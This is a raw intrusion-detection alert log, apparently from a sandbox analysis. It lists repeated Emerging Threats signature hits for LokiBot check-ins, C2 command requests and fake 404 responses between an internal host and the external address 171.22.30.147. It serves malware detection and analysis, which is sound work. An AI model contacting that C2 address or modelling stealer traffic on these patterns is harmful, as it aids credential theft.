              192.168.2.3171.22.30.14749829802021641 01/05/23-08:52:49.001962TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749772802021641 01/05/23-08:52:31.644906TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749867802021641 01/05/23-08:53:00.773467TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749954802025381 01/05/23-08:53:25.726692TCP2025381ET TROJAN LokiBot Checkin4995480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749805802825766 01/05/23-08:52:42.467353TCP2825766ETPRO TROJAN LokiBot Checkin M24980580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749861802021641 01/05/23-08:52:59.149010TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749819802025381 01/05/23-08:52:46.293306TCP2025381ET TROJAN LokiBot Checkin4981980192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380500002025483 01/05/23-08:53:40.075634TCP2025483ET TROJAN LokiBot Fake 404 Response8050000171.22.30.147192.168.2.3
              171.22.30.147192.168.2.380500822025483 01/05/23-08:54:03.613532TCP2025483ET TROJAN LokiBot Fake 404 Response8050082171.22.30.147192.168.2.3
              171.22.30.147192.168.2.380498722025483 01/05/23-08:53:02.170418TCP2025483ET TROJAN LokiBot Fake 404 Response8049872171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749776802025381 01/05/23-08:52:33.619524TCP2025381ET TROJAN LokiBot Checkin4977680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749920802025381 01/05/23-08:53:16.511672TCP2025381ET TROJAN LokiBot Checkin4992080192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497412025483 01/05/23-08:52:22.999014TCP2025483ET TROJAN LokiBot Fake 404 Response8049741171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749895802021641 01/05/23-08:53:08.372653TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989580192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499272025483 01/05/23-08:53:18.508316TCP2025483ET TROJAN LokiBot Fake 404 Response8049927171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749928802825766 01/05/23-08:53:18.678448TCP2825766ETPRO TROJAN LokiBot Checkin M24992880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749922802825766 01/05/23-08:53:17.061545TCP2825766ETPRO TROJAN LokiBot Checkin M24992280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749952802024313 01/05/23-08:53:25.200806TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749952802024318 01/05/23-08:53:25.200806TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749785802825766 01/05/23-08:52:36.951784TCP2825766ETPRO TROJAN LokiBot Checkin M24978580192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497852025483 01/05/23-08:52:37.034393TCP2025483ET TROJAN LokiBot Fake 404 Response8049785171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749833802825766 01/05/23-08:52:50.090304TCP2825766ETPRO TROJAN LokiBot Checkin M24983380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749851802825766 01/05/23-08:52:56.435777TCP2825766ETPRO TROJAN LokiBot Checkin M24985180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749938802021641 01/05/23-08:53:21.374225TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993880192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498282025483 01/05/23-08:52:48.817477TCP2025483ET TROJAN LokiBot Fake 404 Response8049828171.22.30.147192.168.2.3
              171.22.30.147192.168.2.380497082025483 01/05/23-08:52:10.878854TCP2025483ET TROJAN LokiBot Fake 404 Response8049708171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749956802021641 01/05/23-08:53:26.250117TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995680192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499712025483 01/05/23-08:53:32.380645TCP2025483ET TROJAN LokiBot Fake 404 Response8049971171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749749802024318 01/05/23-08:52:25.162571TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750015802025381 01/05/23-08:53:43.993137TCP2025381ET TROJAN LokiBot Checkin5001580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750083802021641 01/05/23-08:54:03.789158TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5008380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749746802024313 01/05/23-08:52:24.299560TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749749802024313 01/05/23-08:52:25.162571TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749832802024318 01/05/23-08:52:49.809310TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750016802024313 01/05/23-08:53:44.267939TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001680192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380500162025483 01/05/23-08:53:44.354822TCP2025483ET TROJAN LokiBot Fake 404 Response8050016171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14750019802024313 01/05/23-08:53:45.311637TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749924802024318 01/05/23-08:53:17.587003TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750073802825766 01/05/23-08:54:00.951462TCP2825766ETPRO TROJAN LokiBot Checkin M25007380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750016802024318 01/05/23-08:53:44.267939TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749734802021641 01/05/23-08:52:20.978367TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749832802024313 01/05/23-08:52:49.809310TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749921802024313 01/05/23-08:53:16.794242TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750019802024318 01/05/23-08:53:45.311637TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749921802024318 01/05/23-08:53:16.794242TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749774802024318 01/05/23-08:52:32.369884TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749706802021641 01/05/23-08:52:09.771973TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4970680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749978802024313 01/05/23-08:53:34.155329TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749709802021641 01/05/23-08:52:11.256691TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4970980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749774802024313 01/05/23-08:52:32.369884TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749748802025381 01/05/23-08:52:24.879047TCP2025381ET TROJAN LokiBot Checkin4974880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750018802025381 01/05/23-08:53:44.999195TCP2025381ET TROJAN LokiBot Checkin5001880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749925802825766 01/05/23-08:53:17.874226TCP2825766ETPRO TROJAN LokiBot Checkin M24992580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749860802024313 01/05/23-08:52:58.886735TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986080192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498782025483 01/05/23-08:53:03.786236TCP2025483ET TROJAN LokiBot Fake 404 Response8049878171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749747802825766 01/05/23-08:52:24.577114TCP2825766ETPRO TROJAN LokiBot Checkin M24974780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749978802024318 01/05/23-08:53:34.155329TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749860802024318 01/05/23-08:52:58.886735TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749877802825766 01/05/23-08:53:03.433942TCP2825766ETPRO TROJAN LokiBot Checkin M24987780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749926802025381 01/05/23-08:53:18.143087TCP2025381ET TROJAN LokiBot Checkin4992680192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498562025483 01/05/23-08:52:57.873353TCP2025483ET TROJAN LokiBot Fake 404 Response8049856171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749912802021641 01/05/23-08:53:14.329479TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991280192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497142025483 01/05/23-08:52:13.439751TCP2025483ET TROJAN LokiBot Fake 404 Response8049714171.22.30.147192.168.2.3
              171.22.30.147192.168.2.380500382025483 01/05/23-08:53:51.682835TCP2025483ET TROJAN LokiBot Fake 404 Response8050038171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749788802825766 01/05/23-08:52:37.784136TCP2825766ETPRO TROJAN LokiBot Checkin M24978880192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499872025483 01/05/23-08:53:36.633144TCP2025483ET TROJAN LokiBot Fake 404 Response8049987171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749746802024318 01/05/23-08:52:24.299560TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749924802024313 01/05/23-08:53:17.587003TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992480192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498342025483 01/05/23-08:52:50.604457TCP2025483ET TROJAN LokiBot Fake 404 Response8049834171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14750070802825766 01/05/23-08:54:00.166694TCP2825766ETPRO TROJAN LokiBot Checkin M25007080192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499832025483 01/05/23-08:53:35.550441TCP2025483ET TROJAN LokiBot Fake 404 Response8049983171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14750047802825766 01/05/23-08:53:54.007519TCP2825766ETPRO TROJAN LokiBot Checkin M25004780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750048802021641 01/05/23-08:53:54.265201TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5004880192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498502025483 01/05/23-08:52:56.257670TCP2025483ET TROJAN LokiBot Fake 404 Response8049850171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749719802825766 01/05/23-08:52:15.841614TCP2825766ETPRO TROJAN LokiBot Checkin M24971980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750054802024313 01/05/23-08:53:55.890469TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15005480192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499462025483 01/05/23-08:53:23.634143TCP2025483ET TROJAN LokiBot Fake 404 Response8049946171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749871802025381 01/05/23-08:53:01.829225TCP2025381ET TROJAN LokiBot Checkin4987180192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380500222025483 01/05/23-08:53:46.752847TCP2025483ET TROJAN LokiBot Fake 404 Response8050022171.22.30.147192.168.2.3
              171.22.30.147192.168.2.380500262025483 01/05/23-08:53:48.419968TCP2025483ET TROJAN LokiBot Fake 404 Response8050026171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749849802024318 01/05/23-08:52:55.895226TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749947802024318 01/05/23-08:53:23.814636TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749818802021641 01/05/23-08:52:46.013246TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749944802021641 01/05/23-08:53:23.021157TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994480192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499092025483 01/05/23-08:53:13.570729TCP2025483ET TROJAN LokiBot Fake 404 Response8049909171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749754802024313 01/05/23-08:52:26.655822TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749852802024313 01/05/23-08:52:56.705137TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749754802024318 01/05/23-08:52:26.655822TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749852802024318 01/05/23-08:52:56.705137TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749966802025381 01/05/23-08:53:30.946864TCP2025381ET TROJAN LokiBot Checkin4996680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749868802025381 01/05/23-08:53:01.029018TCP2025381ET TROJAN LokiBot Checkin4986880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749745802025381 01/05/23-08:52:24.023320TCP2025381ET TROJAN LokiBot Checkin4974580192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498882025483 01/05/23-08:53:06.467800TCP2025483ET TROJAN LokiBot Fake 404 Response8049888171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749955802024313 01/05/23-08:53:25.989714TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750073802025381 01/05/23-08:54:00.951462TCP2025381ET TROJAN LokiBot Checkin5007380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749951802825766 01/05/23-08:53:24.927407TCP2825766ETPRO TROJAN LokiBot Checkin M24995180192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499052025483 01/05/23-08:53:12.488803TCP2025483ET TROJAN LokiBot Fake 404 Response8049905171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749750802825766 01/05/23-08:52:25.450968TCP2825766ETPRO TROJAN LokiBot Checkin M24975080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750004802025381 01/05/23-08:53:41.033557TCP2025381ET TROJAN LokiBot Checkin5000480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749727802825766 01/05/23-08:52:18.985108TCP2825766ETPRO TROJAN LokiBot Checkin M24972780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749849802024313 01/05/23-08:52:55.895226TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749845802825766 01/05/23-08:52:54.838950TCP2825766ETPRO TROJAN LokiBot Checkin M24984580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749826802021641 01/05/23-08:52:48.184567TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750054802024318 01/05/23-08:53:55.890469TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25005480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749743802021641 01/05/23-08:52:23.467755TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750071802021641 01/05/23-08:54:00.426977TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5007180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749838802021641 01/05/23-08:52:52.824149TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749891802025381 01/05/23-08:53:07.205477TCP2025381ET TROJAN LokiBot Checkin4989180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749734802024313 01/05/23-08:52:20.978367TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750062802024313 01/05/23-08:53:58.073723TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15006280192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497892025483 01/05/23-08:52:38.164363TCP2025483ET TROJAN LokiBot Fake 404 Response8049789171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749789802021641 01/05/23-08:52:38.076275TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749734802024318 01/05/23-08:52:20.978367TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750062802024318 01/05/23-08:53:58.073723TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25006280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749887802021641 01/05/23-08:53:06.117016TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749703802021641 01/05/23-08:52:08.565296TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4970380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749946802025381 01/05/23-08:53:23.547730TCP2025381ET TROJAN LokiBot Checkin4994680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749753802025381 01/05/23-08:52:26.326305TCP2025381ET TROJAN LokiBot Checkin4975380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749872802024318 01/05/23-08:53:02.084337TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749869802024318 01/05/23-08:53:01.298022TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749971802825766 01/05/23-08:53:32.299331TCP2825766ETPRO TROJAN LokiBot Checkin M24997180192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498842025483 01/05/23-08:53:05.373418TCP2025483ET TROJAN LokiBot Fake 404 Response8049884171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749955802024318 01/05/23-08:53:25.989714TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749872802024313 01/05/23-08:53:02.084337TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750027802825766 01/05/23-08:53:48.599181TCP2825766ETPRO TROJAN LokiBot Checkin M25002780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749865802825766 01/05/23-08:53:00.234414TCP2825766ETPRO TROJAN LokiBot Checkin M24986580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749902802825766 01/05/23-08:53:11.610501TCP2825766ETPRO TROJAN LokiBot Checkin M24990280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749869802024313 01/05/23-08:53:01.298022TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749989802825766 01/05/23-08:53:37.099082TCP2825766ETPRO TROJAN LokiBot Checkin M24998980192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498692025483 01/05/23-08:53:01.381580TCP2025483ET TROJAN LokiBot Fake 404 Response8049869171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749947802024313 01/05/23-08:53:23.814636TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994780192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498472025483 01/05/23-08:52:55.454099TCP2025483ET TROJAN LokiBot Fake 404 Response8049847171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749730802825766 01/05/23-08:52:19.853027TCP2825766ETPRO TROJAN LokiBot Checkin M24973080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750053802025381 01/05/23-08:53:55.636070TCP2025381ET TROJAN LokiBot Checkin5005380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749924802021641 01/05/23-08:53:17.587003TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749904802021641 01/05/23-08:53:12.139251TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990480192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380500072025483 01/05/23-08:53:41.908536TCP2025483ET TROJAN LokiBot Fake 404 Response8050007171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14750042802024313 01/05/23-08:53:52.687057TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15004280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749711802021641 01/05/23-08:52:12.061796TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750042802024318 01/05/23-08:53:52.687057TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25004280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749800802021641 01/05/23-08:52:41.099242TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749806802021641 01/05/23-08:52:42.779655TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749809802024318 01/05/23-08:52:43.596832TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980980192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380500042025483 01/05/23-08:53:41.114864TCP2025483ET TROJAN LokiBot Fake 404 Response8050004171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749766802024313 01/05/23-08:52:30.012463TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749809802024313 01/05/23-08:52:43.596832TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749707802825766 01/05/23-08:52:10.342729TCP2825766ETPRO TROJAN LokiBot Checkin M24970780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749766802024318 01/05/23-08:52:30.012463TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749840802024318 01/05/23-08:52:53.465268TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750002802021641 01/05/23-08:53:40.505314TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750005802024313 01/05/23-08:53:41.297546TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749822802025381 01/05/23-08:52:47.112264TCP2025381ET TROJAN LokiBot Checkin4982280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750005802024318 01/05/23-08:53:41.297546TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749935802024318 01/05/23-08:53:20.565175TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750011802021641 01/05/23-08:53:42.925761TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749993802021641 01/05/23-08:53:38.145026TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749840802024313 01/05/23-08:52:53.465268TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750044802025381 01/05/23-08:53:53.227481TCP2025381ET TROJAN LokiBot Checkin5004480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749796802825766 01/05/23-08:52:39.986568TCP2825766ETPRO TROJAN LokiBot Checkin M24979680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749733802025381 01/05/23-08:52:20.679095TCP2025381ET TROJAN LokiBot Checkin4973380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749967802024313 01/05/23-08:53:31.230819TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996780192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498662025483 01/05/23-08:53:00.596675TCP2025483ET TROJAN LokiBot Fake 404 Response8049866171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749878802024313 01/05/23-08:53:03.704233TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750031802021641 01/05/23-08:53:49.661487TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003180192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380500482025483 01/05/23-08:53:54.346619TCP2025483ET TROJAN LokiBot Fake 404 Response8050048171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749911802825766 01/05/23-08:53:14.014731TCP2825766ETPRO TROJAN LokiBot Checkin M24991180192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499992025483 01/05/23-08:53:39.815924TCP2025483ET TROJAN LokiBot Fake 404 Response8049999171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749710802825766 01/05/23-08:52:11.662757TCP2825766ETPRO TROJAN LokiBot Checkin M24971080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750074802024313 01/05/23-08:54:01.233569TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15007480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750015802825766 01/05/23-08:53:43.993137TCP2825766ETPRO TROJAN LokiBot Checkin M25001580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750074802024318 01/05/23-08:54:01.233569TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25007480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749739802825766 01/05/23-08:52:22.339123TCP2825766ETPRO TROJAN LokiBot Checkin M24973980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750021802825766 01/05/23-08:53:46.361205TCP2825766ETPRO TROJAN LokiBot Checkin M25002180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749783802021641 01/05/23-08:52:36.372208TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749940802025381 01/05/23-08:53:21.893765TCP2025381ET TROJAN LokiBot Checkin4994080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749848802025381 01/05/23-08:52:55.640788TCP2025381ET TROJAN LokiBot Checkin4984880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749878802024318 01/05/23-08:53:03.704233TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749967802024318 01/05/23-08:53:31.230819TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749875802021641 01/05/23-08:53:02.907470TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750028802021641 01/05/23-08:53:48.853917TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749765802025381 01/05/23-08:52:29.748218TCP2025381ET TROJAN LokiBot Checkin4976580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749792802021641 01/05/23-08:52:38.887901TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749937802025381 01/05/23-08:53:21.090422TCP2025381ET TROJAN LokiBot Checkin4993780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749977802825766 01/05/23-08:53:33.899852TCP2825766ETPRO TROJAN LokiBot Checkin M24997780192.168.2.3171.22.30.147
